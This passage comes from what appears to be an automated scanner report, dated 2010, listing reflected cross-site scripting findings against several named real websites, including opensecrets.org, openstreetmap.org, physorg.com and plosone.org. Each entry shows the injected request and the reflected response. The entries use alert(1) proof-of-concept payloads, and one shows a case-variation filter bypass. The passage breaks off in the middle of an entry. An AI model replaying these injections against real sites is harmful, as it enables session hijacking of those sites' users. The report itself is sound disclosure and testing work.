
Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /twitter/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f23d0"><a>4971b5e26ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /twitterf23d0"><a>4971b5e26ce/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="twitterf23d0"><a>4971b5e26ce_page" class="twitterf23d0">
...[SNIP]...

1.377. http://www.ninkasibrewing.com/twitter/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /twitter/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb490"><a>66876d9e15c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /twitterfb490"><a>66876d9e15c/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="twitterfb490"><a>66876d9e15c_page" class="twitterfb490">
...[SNIP]...

1.378. http://www.opensecrets.org/politicians/contrib.php [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opensecrets.org
Path:   /politicians/contrib.php

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93c4d"><script>alert(1)</script>a004d33db4e was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /politicians/contrib.php?cycle=Career&cid=N0000488793c4d"><script>alert(1)</script>a004d33db4e&type=C HTTP/1.1
Host: www.opensecrets.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 21 Nov 2010 21:44:53 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.10
Vary: Accept-Encoding
Content-Type: text/html
X-Cache: MISS from www.opensecrets.org
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
<meta ht
...[SNIP]...
<a
href="summary.php?cycle=Career&cid=N0000488793c4d"><script>alert(1)</script>a004d33db4e&type=C">
...[SNIP]...

1.379. http://www.opensecrets.org/politicians/contrib.php [cycle parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opensecrets.org
Path:   /politicians/contrib.php

Issue detail

The value of the cycle request parameter is copied into the HTML document as plain text between tags. The payload 9d455<script>alert(1)</script>ddfee2d13cf was submitted in the cycle parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /politicians/contrib.php?cycle=Career9d455<script>alert(1)</script>ddfee2d13cf&cid=N00004887&type=C HTTP/1.1
Host: www.opensecrets.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 21 Nov 2010 21:44:50 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.10
Vary: Accept-Encoding
Content-Type: text/html
X-Cache: MISS from www.opensecrets.org
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
<meta ht
...[SNIP]...
<h3> -1 - Career9d455<script>alert(1)</script>ddfee2d13cf</h3>
...[SNIP]...

1.380. http://www.opensecrets.org/politicians/contrib.php [cycle parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opensecrets.org
Path:   /politicians/contrib.php

Issue detail

The value of the cycle request parameter is copied into the HTML document as text between TITLE tags. The payload c2ad9</title><script>alert(1)</script>5dcde8f9c6d was submitted in the cycle parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /politicians/contrib.php?cycle=Careerc2ad9</title><script>alert(1)</script>5dcde8f9c6d&cid=N00004887&type=C HTTP/1.1
Host: www.opensecrets.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 21 Nov 2010 21:44:51 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.10
Vary: Accept-Encoding
Content-Type: text/html
X-Cache: MISS from www.opensecrets.org
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
<meta ht
...[SNIP]...
<title>
: Campaign Finance/Money - Top Donors - Careerc2ad9</title><script>alert(1)</script>5dcde8f9c6d | OpenSecrets
</title>
...[SNIP]...

1.381. http://www.opensecrets.org/politicians/contrib.php [cycle parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opensecrets.org
Path:   /politicians/contrib.php

Issue detail

The value of the cycle request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1feb"><script>alert(1)</script>f0957ca7398 was submitted in the cycle parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /politicians/contrib.php?cycle=Careera1feb"><script>alert(1)</script>f0957ca7398&cid=N00004887&type=C HTTP/1.1
Host: www.opensecrets.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 21 Nov 2010 21:44:49 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.10
Vary: Accept-Encoding
Content-Type: text/html
X-Cache: MISS from www.opensecrets.org
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
<meta ht
...[SNIP]...
<a
href="summary.php?cycle=Careera1feb"><script>alert(1)</script>f0957ca7398&cid=N00004887&type=C">
...[SNIP]...

1.382. http://www.opensecrets.org/politicians/contrib.php [type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opensecrets.org
Path:   /politicians/contrib.php

Issue detail

The value of the type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a421b"><script>alert(1)</script>8d871a67f2e was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /politicians/contrib.php?cycle=Career&cid=N00004887&type=Ca421b"><script>alert(1)</script>8d871a67f2e HTTP/1.1
Host: www.opensecrets.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 21 Nov 2010 21:44:54 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.10
Vary: Accept-Encoding
Content-Type: text/html
X-Cache: MISS from www.opensecrets.org
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
<meta ht
...[SNIP]...
<a
href="summary.php?cycle=Career&cid=N00004887&type=Ca421b"><script>alert(1)</script>8d871a67f2e">
...[SNIP]...

1.383. http://www.openstreetmap.org/ [mlat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.openstreetmap.org
Path:   /

Issue detail

The value of the mlat request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c9f04%3balert(1)//ab6add74dfc was submitted in the mlat parameter. This input was echoed as c9f04;alert(1)//ab6add74dfc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?mlat=37.762352c9f04%3balert(1)//ab6add74dfc&mlon=-122.419372&zoom=16 HTTP/1.1
Host: www.openstreetmap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:46:24 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.0
Vary: Accept-Language,Accept-Encoding
ETag: "98ed9f7887f21c8933f64bfa8168e058"
Content-Language: en
X-Runtime: 57
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _osm_session=3ab760df61ea67dabbe84c6edbc47714; path=/; HttpOnly
Content-Length: 13620
Status: 200
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
map.dataLayer.events.register("visibilitychanged", map.dataLayer, toggleData);
map.addLayer(map.dataLayer);


var centre = new OpenLayers.LonLat(-122.419372, 37.762352c9f04;alert(1)//ab6add74dfc);
var zoom = 16;


setMapCenter(centre, zoom);


updateLocation();


marker = addMarkerToMap(new OpenLayers.LonLat(-122.419372, 37.762352c9f04
...[SNIP]...

1.384. http://www.openstreetmap.org/ [mlon parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.openstreetmap.org
Path:   /

Issue detail

The value of the mlon request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a2b6c%3balert(1)//496a80fd0b8 was submitted in the mlon parameter. This input was echoed as a2b6c;alert(1)//496a80fd0b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?mlat=37.762352&mlon=-122.419372a2b6c%3balert(1)//496a80fd0b8&zoom=16 HTTP/1.1
Host: www.openstreetmap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:46:34 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.0
Vary: Accept-Language,Accept-Encoding
ETag: "ae2ac1faa7b8fe0f182280d85b318796"
Content-Language: en
X-Runtime: 67
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _osm_session=2746ff435375896840942722bb8dac84; path=/; HttpOnly
Content-Length: 13620
Status: 200
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
alse });
map.dataLayer.events.register("visibilitychanged", map.dataLayer, toggleData);
map.addLayer(map.dataLayer);


var centre = new OpenLayers.LonLat(-122.419372a2b6c;alert(1)//496a80fd0b8, 37.762352);
var zoom = 16;


setMapCenter(centre, zoom);


updateLocation();


marker = addMarkerToMap(new OpenLayers.LonLat(-122.419372a2b6c
...[SNIP]...

1.385. http://www.openstreetmap.org/ [zoom parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.openstreetmap.org
Path:   /

Issue detail

The value of the zoom request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 20e64%3balert(1)//7a792e8d481 was submitted in the zoom parameter. This input was echoed as 20e64;alert(1)//7a792e8d481 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?mlat=37.762352&mlon=-122.419372&zoom=1620e64%3balert(1)//7a792e8d481 HTTP/1.1
Host: www.openstreetmap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:46:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.0
Vary: Accept-Language,Accept-Encoding
ETag: "daa01e483bd0a0366fd0d29187fb0f5e"
Content-Language: en
X-Runtime: 74
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _osm_session=6f0431e1f36c0346ed07074635529859; path=/; HttpOnly
Content-Length: 13593
Status: 200
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
.register("visibilitychanged", map.dataLayer, toggleData);
map.addLayer(map.dataLayer);


var centre = new OpenLayers.LonLat(-122.419372, 37.762352);
var zoom = 1620e64;alert(1)//7a792e8d481;


setMapCenter(centre, zoom);


updateLocation();


marker = addMarkerToMap(new OpenLayers.LonLat(-122.419372, 37.762352));


map.event
...[SNIP]...

1.386. http://www.partizan.com/partizan/musicvideos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.partizan.com
Path:   /partizan/musicvideos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82da3"><a>9c21b1ec5a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /partizan/musicvideos/?82da3"><a>9c21b1ec5a4=1 HTTP/1.1
Host: www.partizan.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:46:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=4trmr1ed1i9i47ca7idls32ai5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 10384

   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en
...[SNIP]...
<a href="/partizan/musicvideos/?82da3"><a>9c21b1ec5a4=1/biography" class="txtlink">
...[SNIP]...

1.387. http://www.partizan.com/partizan/musicvideos/ [saam_farahmand parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.partizan.com
Path:   /partizan/musicvideos/

Issue detail

The value of the saam_farahmand request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa123"><a>d9ce746badf was submitted in the saam_farahmand parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /partizan/musicvideos/?saam_farahmandaa123"><a>d9ce746badf HTTP/1.1
Host: www.partizan.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:46:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=ljfjpe7s746q4aq0lp29rsll96; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 10396

   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en
...[SNIP]...
<a href="/partizan/musicvideos/?saam_farahmandaa123"><a>d9ce746badf/biography" class="txtlink">
...[SNIP]...

1.388. http://www.physorg.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.physorg.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 81078--><script>alert(1)</script>2aa8be689af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?81078--><script>alert(1)</script>2aa8be689af=1 HTTP/1.1
Host: www.physorg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 21 Nov 2010 21:42:17 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 Error
...[SNIP]...
</strong>link: /?81078--><script>alert(1)</script>2aa8be689af=1 from </p>
...[SNIP]...

1.389. http://www.physorg.com/rss-feed/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.physorg.com
Path:   /rss-feed/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 860ed--><script>alert(1)</script>150357d3616 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /860ed--><script>alert(1)</script>150357d3616/ HTTP/1.1
Host: www.physorg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 21 Nov 2010 21:42:19 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 Error
...[SNIP]...
</strong>link: /860ed--><script>alert(1)</script>150357d3616/ from </p>
...[SNIP]...

1.390. http://www.physorg.com/rss-feed/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.physorg.com
Path:   /rss-feed/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f23bb"><script>alert(1)</script>02b8f422e53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /f23bb"><script>alert(1)</script>02b8f422e53/ HTTP/1.1
Host: www.physorg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 21 Nov 2010 21:42:16 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 Error
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6035753&c3=6035753&c4=http://www.physorg.com/f23bb"><script>alert(1)</script>02b8f422e53/&c5=Technology - News&c6=&c15=&cv=1.3&cj=1"
       style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.391. http://www.physorg.com/rss-feed/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.physorg.com
Path:   /rss-feed/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f459e"-alert(1)-"f28d0b6f659 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /f459e"-alert(1)-"f28d0b6f659/ HTTP/1.1
Host: www.physorg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 21 Nov 2010 21:42:17 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 Error
...[SNIP]...
<script>
       COMSCORE.beacon({
       c1:2,
       c2:"6035753",
       c3:"6035753",
       c4:"http://www.physorg.com/f459e"-alert(1)-"f28d0b6f659/", //current page url
       c5:"Technology - News",
       c6:"",
       c15:""
       });
   </script>
...[SNIP]...

1.392. http://www.plosone.org/article/info:doi/10.1371/journal.pone.0015502 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.plosone.org
Path:   /article/info:doi/10.1371/journal.pone.0015502

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39652"><ScRiPt>alert(1)</ScRiPt>5b9f319d054 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /article/info:doi/10.1371/journal.pone.0015502?39652"><ScRiPt>alert(1)</ScRiPt>5b9f319d054=1 HTTP/1.1
Host: www.plosone.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:42:40 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: JSESSIONID=F914DB9D7DBEA2B6B0FBDEF21F1F6B1A.ambra02; Path=/; HttpOnly
Cache-Control: max-age=1
Expires: Sun, 21 Nov 2010 21:42:41 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: Coyote-2-95144505=9514450e:0; path=/
Content-Length: 117546


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:foaf="http://xmln
...[SNIP]...
<a href="/article/metrics/info%3Adoi%2F10.1371%2Fjournal.pone.0015502&amp;39652"><ScRiPt>alert(1)</ScRiPt>5b9f319d054=1;jsessionid=F914DB9D7DBEA2B6B0FBDEF21F1F6B1A.ambra02" title="More information">
...[SNIP]...

1.393. http://www.plusmo.com/add [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.plusmo.com
Path:   /add

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 7ba2f<script>alert(1)</script>f778b5fc1b2 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /add?url=http%3A%2F%2Ffeeds.feedburner.com%2FDeloitteUs7ba2f<script>alert(1)</script>f778b5fc1b2 HTTP/1.1
Host: www.plusmo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:42:54 GMT
Server: Apache/2.2.6 (Fedora)
Connection: close
Content-Type: text/html; charset=UTF8
Content-Length: 10485

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<span>RSS Feed http://feeds.feedburner.com/DeloitteUs7ba2f<script>alert(1)</script>f778b5fc1b2</span>
...[SNIP]...

1.394. http://www.plusmo.com/add [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.plusmo.com
Path:   /add

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c45c"><script>alert(1)</script>0b34d28b590 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /add?url=http%3A%2F%2Ffeeds.feedburner.com%2FDeloitteUs2c45c"><script>alert(1)</script>0b34d28b590 HTTP/1.1
Host: www.plusmo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:42:52 GMT
Server: Apache/2.2.6 (Fedora)
Connection: close
Content-Type: text/html; charset=UTF8
Content-Length: 10503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<meta name="description" content="RSS Feed http://feeds.feedburner.com/DeloitteUs2c45c"><script>alert(1)</script>0b34d28b590 Mobile Widget on Plusmo"/>
...[SNIP]...

1.395. http://www.plusmo.com/add [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.plusmo.com
Path:   /add

Issue detail

